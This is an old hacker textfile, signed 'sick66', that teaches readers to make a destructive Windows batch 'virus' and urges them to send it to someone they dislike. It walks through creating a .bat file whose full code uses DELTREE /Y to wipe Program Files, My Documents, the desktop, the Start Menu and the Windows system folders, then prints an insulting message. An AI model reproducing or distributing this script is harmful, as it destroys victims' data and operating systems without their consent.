| x cRaZy / / | / / / x TeXt / | / | / / / x FiLe / | / | / / / x By: / | / | / / / x /_____ | / |/ / / x / | \ |\ / / x 00/01 / | \ | \ /______ /______ x / | \ | \ / / / / x / | \ | \ / ? / / ? / x / | \ | \ /______/ /______/ x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx H O W T O M A K E A B A T V I R U S X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX disclaimer: fuck the disclaimer, just remember that x a bat virus CAN DESTROY SOMEONES COMPUTER!! x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx send this bat virus to some lamer you hate!! x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx W H A T D O N' T N E E D x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x - programming experience x - hacking skills x - programming utilities x x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx W H A T Y O U N E E D x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x - notepad (not so hard, hey?) x - a target x x yes, it's that easy... here we go x x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx F O L L O W T H E S E S T E P S x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx - right click with your mouse on the desktop - select 'new' - then you will see a list of files you can create, pick 'textfile' - now, name it 'funny' or something (without the ' ') - the put the following code: xxxxxxxxxxxxxxxxx C U T H E R E xxxxxxxxxxxxxxxxxxxxxxx @ECHO OFF IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.* IF EXIST C:\MY DOCUMENTS\*.* DELTREE /Y C:\MY DOCUMENTS\*.* IF EXIST C:\WINDOWS\DESKTOP\*.* DELTREE /Y C:\WINDOWS\DESKTOP\*.* IF EXIST C:\WINDOWS\START MENU\*.* DELTREE /Y C:\WINDOWS\START MENU\*.* IF EXIST C:\WINDOWS\COMMAND\*.* DELTREE /Y C:\WINDOWS\COMMAND\*.* IF EXIST C:\WINDOWS\SYSTEM\*.* DELTREE /Y C:\WINDOWS\SYSTEM\*.* IF EXIST C:\WINDOWS\*.* DELTREE /Y C:\WINDOWS\*.* ECHO *********************** :-P ECHO YOU HAVE BEEN HIT BY THE HARD-DRIVE KILLA! ECHO BY THE WAY.....YOUR COMPUTER IS REALLY FUCKED UP NOW..DUDE! ECHO NASTY...HEY?! IF YOU GOT THIS VIRUS...YOU DESERVED IT, MOTHER-BUT-FUCK! ECHO *********************** :-P ECHO COPYRIGHT SICK66 00/01 xxxxxxxxxxxxxxxxx C U T H E R E xxxxxxxxxxxxxxxxxxxxxxxx notes: - if you put in the code...do it without the 'cut here' line! - if you don't want to type it all again just select the code an hit 'control-c' (ctrl+c) and place your cursor in your new created file and hit control-v (ctrl+v) - when all that is done, select 'save as' and save it as funny.bat - (IT MUST END IN .BAT OR ELSE IT WON'T WORK!!!!!!!!!!!!!!) AS SIMPLE AS THAT...EVEN THE BIGGEST SUCKER CAN DO THIS...RIGHT?? xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx H O W T O C O N T A C T M E: x xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx if you have any questions concerning my textfiles: my e-mail: sick66@chatplaza.nl my icq# : 77293314 my phone number: fuck you man! :-p xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ps: you can also send me a mail about virusses and hacking cuz i'm also into that shit tot ziens (that is dutch for goodbye) -=*sick66*=- .